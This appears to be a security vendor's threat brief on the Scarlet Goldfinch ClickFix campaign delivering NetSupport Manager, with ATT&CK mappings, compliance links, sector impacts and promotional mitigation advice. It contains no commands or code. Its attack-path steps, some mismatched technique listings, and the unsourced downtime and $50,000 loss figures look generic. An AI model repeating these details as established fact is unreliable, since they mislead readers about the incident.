Executive Summary
In 2025, the Scarlet Goldfinch threat actor launched a sophisticated malware campaign utilizing the ClickFix social engineering technique. This method deceived users into executing malicious commands under the guise of routine system verifications, leading to the installation of NetSupport Manager, a remote access tool. The campaign primarily targeted Windows systems, exploiting compromised websites to display fake browser update prompts, which, when acted upon, initiated the malware download and execution process. (redcanary.com)
The significance of this incident lies in the evolution of social engineering tactics, highlighting the increasing sophistication of threat actors in bypassing traditional security measures. The widespread use of ClickFix underscores the necessity for enhanced user education and the implementation of robust security protocols to mitigate such deceptive attack vectors.
Why This Matters Now
The resurgence and evolution of ClickFix campaigns, as demonstrated by Scarlet Goldfinch, emphasize the urgent need for organizations to bolster their defenses against advanced social engineering attacks. The adaptability of these techniques poses a continuous threat, necessitating proactive measures to safeguard sensitive information and maintain operational integrity.
Attack Path Analysis
The Scarlet Goldfinch campaign began with users being tricked into executing malicious commands via fake browser update prompts, leading to the installation of NetSupport Manager. The attackers then escalated privileges by leveraging the remote access capabilities of NetSupport Manager to gain higher-level access. Using this access, they moved laterally across the network to compromise additional systems. They established command and control through NetSupport Manager, allowing continuous remote control over the infected systems. Sensitive data was exfiltrated using the remote access tool to transfer information to external servers. The campaign concluded with the deployment of additional malware, potentially leading to further data theft or system disruption.
Kill Chain Progression
Initial Compromise
Description
Users were deceived into executing malicious commands via fake browser update prompts, leading to the installation of NetSupport Manager.
MITRE ATT&CK® Techniques
User Execution: Malicious Copy and Paste
Phishing: Spearphishing Attachment
Application Layer Protocol: Web Protocols
Command and Scripting Interpreter: PowerShell
Exploitation for Client Execution
Ingress Tool Transfer
Process Injection
Indicator Removal on Host: File Deletion
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Ensure all system components are protected from known vulnerabilities
Control ID: 6.2
NYDFS 23 NYCRR 500 – Training and Monitoring
Control ID: 500.14
DORA – ICT Risk Management Framework
Control ID: Article 5
CISA ZTMM 2.0 – User Training and Awareness
Control ID: 3.1
NIS2 Directive – Cybersecurity Risk Management Measures
Control ID: Article 21
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Financial Services
ClickFix malware campaigns target financial institutions through social engineering, compromising encrypted traffic and enabling lateral movement across banking networks.
Health Care / Life Sciences
Healthcare systems face critical HIPAA compliance risks from ClickFix attacks exploiting unencrypted traffic and inadequate segmentation in medical networks.
Government Administration
Government agencies vulnerable to ClickFix campaigns targeting zero trust gaps, with high risk of lateral movement and data exfiltration.
Information Technology/IT
IT organizations directly targeted by ClickFix malware exploiting cloud security gaps, threatening multicloud visibility and egress policy enforcement capabilities.
Sources
- Scarlet Goldfinch’s year in ClickFixhttps://redcanary.com/blog/threat-intelligence/scarlet-goldfinch-clickfix/Verified
- Think before you Click(Fix): Analyzing the ClickFix social engineering techniquehttps://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/Verified
- ClickFix techniques evolve in new infostealer campaignshttps://www.csoonline.com/article/4145123/clickfix-techniques-evolve-in-new-infostealer-campaigns.htmlVerified
Frequently Asked Questions
Cloud Native Security Fabric Mitigations and ControlsCNSF
Aviatrix Zero Trust CNSF is pertinent to the Scarlet Goldfinch campaign as it could likely limit the attacker's ability to escalate privileges, move laterally, and exfiltrate data by enforcing strict segmentation and controlled egress policies.
Control: Cloud Native Security Fabric (CNSF)
Mitigation: Aviatrix Zero Trust CNSF may not directly prevent the initial execution of malicious commands by users.
Control: Zero Trust Segmentation
Mitigation: Implementing Zero Trust Segmentation could likely limit the attacker's ability to escalate privileges by restricting access to sensitive systems and services.
Control: East-West Traffic Security
Mitigation: East-West Traffic Security would likely reduce the attacker's ability to move laterally by monitoring and controlling internal traffic flows.
Control: Multicloud Visibility & Control
Mitigation: Multicloud Visibility & Control could likely detect and limit unauthorized command and control communications.
Control: Egress Security & Policy Enforcement
Mitigation: Egress Security & Policy Enforcement would likely limit unauthorized data exfiltration by controlling outbound traffic.
While Aviatrix Zero Trust CNSF may not prevent the initial malware deployment, its segmentation and traffic controls could likely limit the spread and impact of additional malware.
Impact at a Glance
Affected Business Functions
- Customer Support
- Online Services
- Data Management
Estimated downtime: 3 days
Estimated loss: $50,000
Potential exposure of customer personal information and internal operational data.
Recommended Actions
Key Takeaways & Next Steps
- • Implement Zero Trust Segmentation to restrict lateral movement and limit the spread of malware within the network.
- • Enhance Threat Detection & Anomaly Response capabilities to identify and respond to unusual activities promptly.
- • Utilize Inline IPS (Suricata) to detect and prevent known exploit patterns and malicious payloads.
- • Enforce Egress Security & Policy Enforcement to control outbound traffic and prevent unauthorized data exfiltration.
- • Ensure comprehensive Multicloud Visibility & Control to monitor and manage security across all cloud environments.
